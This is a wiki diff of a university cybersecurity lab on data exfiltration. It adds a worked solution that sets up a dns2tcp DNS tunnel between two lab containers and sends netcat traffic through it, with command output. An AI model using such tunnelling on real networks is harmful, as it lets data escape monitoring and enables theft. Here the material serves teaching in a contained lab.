This shows you the differences between two versions of the page.
cdci:labs:6 [2020/03/17 01:40] mihai.chiroiu [07. [20p] DNS exfiltration] |
cdci:labs:6 [2024/05/10 14:22] (current) mihai.chiroiu [01. [5p] Virtual machine setup] |
||
---|---|---|---|
Line 1: | Line 1: | ||
====== Lab06. Data exfiltration ====== | ====== Lab06. Data exfiltration ====== | ||
+ | |||
+ | <note warning> | ||
+ | Important read to be graded! | ||
+ | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
+ | </note> | ||
===== Objectives ===== | ===== Objectives ===== | ||
Line 22: | Line 27: | ||
git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | ||
git config user.email "student@upb.ro" | git config user.email "student@upb.ro" | ||
+ | </code> | ||
+ | |||
+ | Now we need to build some docker containers | ||
+ | <code> | ||
+ | root@cdci:/# cd cdci/containers/exfiltration_lab06/ | ||
+ | root@cdci:/# make | ||
</code> | </code> | ||
Line 193: | Line 204: | ||
==== 07. [20p] DNS exfiltration ==== | ==== 07. [20p] DNS exfiltration ==== | ||
- | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is dns2tcp. Use the following configuration for the client/server side. | + | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side. |
* Client side configuration | * Client side configuration | ||
<code> | <code> | ||
Line 219: | Line 230: | ||
<solution> | <solution> | ||
<code> | <code> | ||
+ | root@h2:/# dns2tcpd -f .dns2tcpdrc | ||
+ | root@h2:/# netstat -nlup | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | udp 0 0 0.0.0.0:53 0.0.0.0:* 428/dns2tcpd | ||
+ | root@h2:/# nc -l -p 8080 -k | ||
+ | TEST | ||
+ | |||
+ | root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 & | ||
+ | [2] 196 | ||
+ | root@h1:/# Listening on port : 8080 | ||
+ | root@h1:/# netstat -nltp | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 196/dns2tcpc | ||
+ | root@h1:/# nc 127.0.0.1 8080 | ||
+ | TEST | ||
+ | ^C | ||
</code> | </code> | ||
</solution> | </solution> |